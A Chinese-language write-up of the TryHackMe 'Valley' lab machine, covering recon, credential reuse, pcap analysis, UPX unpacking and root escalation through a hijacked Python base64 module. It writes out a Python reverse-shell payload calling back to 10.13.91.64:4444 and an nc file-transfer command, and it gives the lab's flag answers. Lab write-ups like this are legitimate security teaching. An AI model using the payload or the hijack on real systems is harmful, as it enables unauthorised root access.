Valley靶机渗透实战:从凭证复用到Python库劫持

qife122
315 阅读8分钟

Valley靶机渗透报告 - TryHackMe

本文详细记录了我渗透TryHackMe平台"Valley"靶机的完整方法论。该靶机突显了凭证复用、硬编码密钥和系统文件访问控制不当带来的安全风险。

侦察阶段

我首先扫描目标机器以识别开放端口和服务。为了平衡速度和全面性,我使用了侵略性SYN扫描。

nmap1转存失败,建议直接上传图片文件

初始扫描显示端口22(SSH)、80(HTTP)和37370处于开放状态。

为了获取详细的版本信息并运行默认脚本,我执行了后续服务扫描。

nmap2转存失败,建议直接上传图片文件

结果:

  • 端口22:OpenSSH
  • 端口80:Apache httpd 2.4.41(Ubuntu)
  • 端口37370:vsftpd 3.0.3

枚举阶段

我使用gobuster发现Web服务器上的隐藏目录。

gobuster转存失败,建议直接上传图片文件

扫描发现了几个目录:/gallery、/static和/pricing。"Valley Photo Co."网站是一个简单的宣传网站。检查源代码没有发现有趣的内容,于是我探索已发现的目录。

首页转存失败,建议直接上传图片文件

我注意到/gallery部分中的图像是从/static/目录加载的,带有数字ID(例如/static/1)。我决定对/static/目录进行模糊测试以寻找其他隐藏文件。

static转存失败,建议直接上传图片文件

这次扫描发现了一个名为/00的文件,它比图像文件小得多。访问/static/00显示了一条来自开发人员valleyDev的笔记,其中提到了一个隐藏的开发目录:/dev1243224123123。

00转存失败,建议直接上传图片文件

访问/dev1243224123123端点显示了一个登录页面。

login转存失败,建议直接上传图片文件

在没有有效凭证的情况下,我检查了页面源代码。JavaScript身份验证逻辑是客户端的且为明文。

siemdev转存失败,建议直接上传图片文件

我在登录表单上使用了这些凭证(siemDev:california),这授予了对另一个笔记的访问权限。该笔记是向员工发出的关于为FTP服务复用凭证的警告。这明确提示我尝试在端口37370上运行的vsFTPd服务上使用这些凭证。

ftp转存失败,建议直接上传图片文件

利用阶段

我使用发现的凭证连接到FTP服务。

success转存失败,建议直接上传图片文件

登录成功。我找到了三个.pcapng网络捕获文件。

ls转存失败,建议直接上传图片文件

在启用被动模式后,我使用mget *将它们下载到我的机器上。

mget转存失败,建议直接上传图片文件

我使用Wireshark分析数据包捕获。HTTP2.pcap文件包含了最有趣的数据。在过滤掉UDP数据包并专注于TCP流后,我在TCP流索引31中发现了一个明文HTTP POST请求。

tcp31转存失败,建议直接上传图片文件

该请求发送到/index.html,并包含凭证valleyDev:ph0t0s1234。我尝试使用Burp Suite自己POST到/index.html,但没有产生任何结果。相反,我尝试在端口22上通过SSH使用这些凭证。

ssh转存失败,建议直接上传图片文件

登录成功,我获得了第一个标志(user.txt)。

user.txt转存失败,建议直接上传图片文件

权限提升

我开始枚举系统以寻找权限提升向量。我检查了/etc/crontab文件,发现了一个每分钟以root身份运行的cron作业:

cronjob转存失败,建议直接上传图片文件

这个位于/photos/script/photosEncrypt.py的脚本将照片编码为Base64。该脚本循环遍历/photos/中的图像(p1.jpg到p6.jpg),读取它们,进行编码,并将输出保存到/photos/photoVault,扩展名为.enc。

encrypt转存失败,建议直接上传图片文件

我无法修改或删除原始的pX.jpg文件,因为它们由用户valley拥有,而不是valleyDev。我的下一个目标是横向移动到valley用户。

![valley user](valley user.png)

在/home目录中,我找到了一个名为valleyAuthenticator的ELF二进制文件。执行时,它会提示输入凭证,但我收集的凭证无效。

wrong转存失败,建议直接上传图片文件

我决定使用nc将此文件传输到我的机器。我首先验证了netcat是否已安装在机器上。

nc转存失败,建议直接上传图片文件

然后我将nc切换到监听器模式,指定我将要给接收的文件命名。

valley转存失败,建议直接上传图片文件

最后一步,从发送文件的机器上,我使用了以下命令: nc 10.13.91.64 4444 < valleyAuthenticator

文件在我的机器上后,我使用了strings命令并将输出保存到文本文件。

strings转存失败,建议直接上传图片文件

为了高效分析字符串,我使用了CyberChef。我将strings.txt文件上传到CyberChef,并应用过滤器仅显示具有显著长度(例如21个字符)的字符串以找到有意义的数据。在结果中,我立即注意到了一个明确的指示符:字符串"UPX!",这确认了二进制文件是使用UPX打包的。

upx转存失败,建议直接上传图片文件

我使用命令upx -d valleyAuthenticator解包了二进制文件。然后我再次对解包后的二进制文件运行strings,保存新输出,并将其上传到CyberChef。

unpacked转存失败,建议直接上传图片文件

重新应用过滤器后,我在文件开头附近找到了两个MD5哈希。

md5转存失败,建议直接上传图片文件

我使用在线哈希破解服务(CrackStation)解密它们,得到了明文凭证。

liberty123转存失败,建议直接上传图片文件

我使用这些凭证切换到valley用户。

valley转存失败,建议直接上传图片文件

现在作为valley用户,我需要重新评估通往root的路径。我最初的想法是通过修改源图像(p1.jpg - p6.jpg)来利用此脚本。然而,我发现我无法删除或在该目录中创建新文件;我只能修改现有文件。

过了一段时间,我记得脚本导入了base64模块,我考虑如果我有正确的权限,可以劫持该导入。

我使用id命令检查了我的组成员身份,发现我是valleyAdmin组的成员。

id转存失败,建议直接上传图片文件

然后我检查了Python base64.py库的权限,看看我的组是否有写访问权。

valleyadmin转存失败,建议直接上传图片文件

该文件可由valleyAdmin组写入。由于我是该组的成员,我可以修改它。我使用nano编辑了/usr/lib/python3.8/base64.py,并插入了一个Python反向shell有效载荷:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.91.64",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

![reverse shell](reverse shell.png)

我在我的机器上启动了一个netcat监听器,并等待cron作业执行(在一分钟内)。脚本导入了恶意的base64模块,该模块执行了我的反向shell代码,授予我一个root shell。

![root shell](root shell.png)

我成功以root身份接收到了连接,并可以检索最终标志(root.txt)。

![root flag](root flag.png)

问题答案

  1. 用户标志是什么? THM{k@l1_1n_th3_v@lley}

  2. 根标志是什么? THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc}

就这些!感谢阅读,下次再见!希望这份报告对您有所帮助。

avatar
文章
阅读
粉丝